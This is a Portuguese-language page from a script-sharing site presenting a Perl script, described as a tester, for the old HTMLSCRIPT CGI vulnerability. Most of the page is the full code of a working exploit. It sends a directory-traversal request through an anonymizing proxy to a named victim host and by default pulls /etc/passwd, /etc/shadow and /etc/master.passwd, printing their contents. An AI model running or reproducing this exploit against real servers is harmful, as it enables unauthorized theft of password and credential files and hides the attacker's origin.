Testando servers a HTMLSCRIPT

Publicado por Douglas Vigliazzi 13/12/2002

[ Hits: 4.542 ]

Download htmlscript.PL




Este script testa servidores à vulnerabilidade de HTMLSCRIPT, o qual permite a obtenção de qualquer arquivo, inclusive o passwd e shadow.
Esta falha compromete bastante a segurança.

  



Esconder código-fonte

#!/usr/bin/perl -w
#   $Id: htmlscript.pl,v 1.1 1998/01/29 06:28:52 zap Exp $
#
# Obtém /etc/{passwd,shadow,master.passwd} ou qualquer arquivo de servers
# vulneraveis à htmlscript. A requisição HTTP será feita através de um
# roteador anonimo.
#
# Copyright (c) 1998 by zap <zap@arosnet.se>
# Tradução Douglas Vigliazzi e adaptação
# $Log: htmlscript.pl,v $
# Initial revision
#

use strict;
use Socket;

my ($verbose, $onion_router, $onion_port, $onion_timeout, $iaddr, $paddr,
    $proto, $line);

$verbose   = 1;
$onion_router   = "132.250.80.12";
$onion_port   = 9200;
$onion_timeout   = 10;
$iaddr      = inet_aton($onion_router);
$paddr      = sockaddr_in($onion_port, $iaddr);
$proto      = getprotobyname("tcp");

my ($victim, $file) = @ARGV or die "Usar: httpscript.pl <host> [<arquivo>]\n";

sub get_file {
   $SIG{"ALRM"}    = sub { close(ONION); };
   alarm $onion_timeout;
   
   socket(ONION, AF_INET, SOCK_STREAM, $proto);
   select(ONION); $| = 1; select(STDOUT);

   if (connect(ONION, $paddr)) {
      $SIG{"ALRM"} = "IGNORAR";
      print "[ $victim:$file ]\n" if $verbose;
      print ONION "GET http://$victim/cgi-bin/htmlscript?../../../",
             "../../../../..$file\n\n";
      while (defined($line = <ONION>)) { print $line }
   } else {
      die "Erro: Conexão para roteador $onion_router esgotada ",
          " ($onion_timeout\s).\n";
   }
   close(ONION);
}

if ($file) { get_file; } else {
   $file = "/etc/passwd"; get_file;
   $file = "/etc/shadow"; get_file;
   $file = "/etc/master.passwd"; get_file;
}

Scripts recomendados

Script de Analise do Syslog SNORT

Gerador de Senhas Aleatórias VERSÃO 2.0

Laila MD5 Crack Search

Script para encontrar vulnerabilidades no BIND

Brutal Force Attack


  

Comentários

Nenhum comentário foi encontrado.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts